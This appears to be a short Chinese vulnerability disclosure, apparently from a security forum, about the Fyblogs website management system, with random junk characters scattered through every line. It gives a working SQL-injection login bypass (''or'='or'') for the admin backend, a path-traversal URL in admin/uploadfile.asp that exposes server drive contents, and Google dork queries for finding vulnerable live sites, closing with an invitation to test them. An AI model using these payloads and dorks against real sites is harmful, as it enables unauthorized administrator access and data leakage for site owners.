漏洞类型: 未授权访问/权限绕过4 g9 c' F. S" [/ V
$ v7 B. p- x) }- R& \
简要描述:
: F( R! i& B! o8 F3 h& R: y W5 w! Z: X7 A/ g
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
' O7 Z) y. W! S& G4 B8 w2 i' r) ?4 j- U% y
详细说明:: B# c9 \, W9 D) R3 b8 l G' c8 b* B
! |; n( w. h8 A, ]( Y: m后台万能密码 'or'='or'
6 j( {$ M/ R5 _: P% f1 a" C, L后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 O) h; e. m1 I4 n) jadmin/uploadfile.asp?currentFolder=/upfiles/../
3 \- z5 T0 }! r5 b
# p" z" h1 {$ S1 \漏洞证明:
* Q9 o, u! {* n
9 {) ]3 ~$ {+ t* `6 l% {' |谷歌:inurl:type.asp?id=1 新闻中心1 Y4 A$ L( v+ N9 B9 E0 Z0 V f
或者 :inurl:download_ok.asp?
, M' F4 M2 p6 ~' k1 {
% S Z& b7 E; T9 ?: P7 P+ r% g/ w5 H可以测试+ {& R+ f# k" K: ]8 u/ p
5 X$ ?% J: c# A6 c! E* D7 H3 {, @$ H, D
|